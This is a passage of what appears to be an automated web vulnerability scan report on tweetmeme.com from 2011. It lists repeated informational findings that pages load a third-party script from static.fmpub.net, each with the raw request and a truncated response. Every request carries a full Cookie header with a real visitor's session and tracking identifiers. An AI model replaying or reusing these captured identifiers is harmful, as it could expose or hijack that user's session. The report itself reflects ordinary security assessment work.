Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:36:40 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036530494689941
X-Served-In: 0.059098958969116
X-Served-By: h01
Content-Length: 55024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Sof
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.407. http://tweetmeme.com/category/worldbusiness

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/worldbusiness

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:37:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032830238342285
X-Served-In: 0.055141925811768
X-Served-By: h02
Content-Length: 54653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Wor
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.408. http://tweetmeme.com/category/worldbusiness-business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/worldbusiness-business

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-business HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:37:47 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032651424407959
X-Served-In: 0.059489011764526
X-Served-By: h03
Content-Length: 55901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Bus
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.409. http://tweetmeme.com/category/worldbusiness-finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/worldbusiness-finance

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-finance HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:37:58 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032138824462891
X-Served-In: 0.049069881439209
X-Served-By: ded2061
Content-Length: 56493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Fin
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.410. http://tweetmeme.com/category/worldbusiness-jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/worldbusiness-jobs

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-jobs HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:38:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0067570209503174
X-Served-In: 0.076403141021729
X-Served-By: h04
Content-Length: 56901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Job
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.411. http://tweetmeme.com/category/worldbusiness-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/worldbusiness-news

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-news HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:38:25 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0045719146728516
X-Served-In: 0.057440996170044
X-Served-By: ded2062
Content-Length: 55009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
New
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.412. http://tweetmeme.com/category/worldbusiness-politicalnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /category/worldbusiness-politicalnews

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /category/worldbusiness-politicalnews HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:38:27 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034549236297607
X-Served-In: 0.05449104309082
X-Served-By: ded2062
Content-Length: 55573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Pol
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.413. http://tweetmeme.com/media/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /media/news

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /media/news HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:04 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042040348052979
X-Served-In: 0.038295984268188
X-Served-By: h01
Content-Length: 55415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.414. http://tweetmeme.com/page/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/10

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/10 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0086700916290283
X-Served-In: 0.043781995773315
X-Served-By: ded2060
Content-Length: 56619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.415. http://tweetmeme.com/page/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/2

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/2 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:55:54 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0074641704559326
X-Served-In: 0.29885697364807
X-Served-By: ded2061
Content-Length: 55553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.416. http://tweetmeme.com/page/3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/3

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/3 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:56:49 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0053110122680664
X-Served-In: 2.419842004776
X-Served-By: h00
Content-Length: 55833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.417. http://tweetmeme.com/page/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/4

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/4 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:57:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0039119720458984
X-Served-In: 0.047711849212646
X-Served-By: h01
Content-Length: 55139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.418. http://tweetmeme.com/page/5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/5

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/5 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:57:29 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0048031806945801
X-Served-In: 2.2458288669586
X-Served-By: h01
Content-Length: 55429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.419. http://tweetmeme.com/page/6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/6

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/6 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:58:37 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0046608448028564
X-Served-In: 0.045732021331787
X-Served-By: h01
Content-Length: 54615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.420. http://tweetmeme.com/page/7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/7

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/7 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:58:48 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044929981231689
X-Served-In: 0.049485921859741
X-Served-By: h00
Content-Length: 56069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.421. http://tweetmeme.com/page/8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/8

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/8 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:58:56 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0071430206298828
X-Served-In: 0.092781066894531
X-Served-By: ded2059
Content-Length: 55960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.422. http://tweetmeme.com/page/9

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /page/9

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /page/9 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0069260597229004
X-Served-In: 0.043330907821655
X-Served-By: h00
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.423. http://tweetmeme.com/story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft

Summary

Severity:   Information
Confidence:   Certain
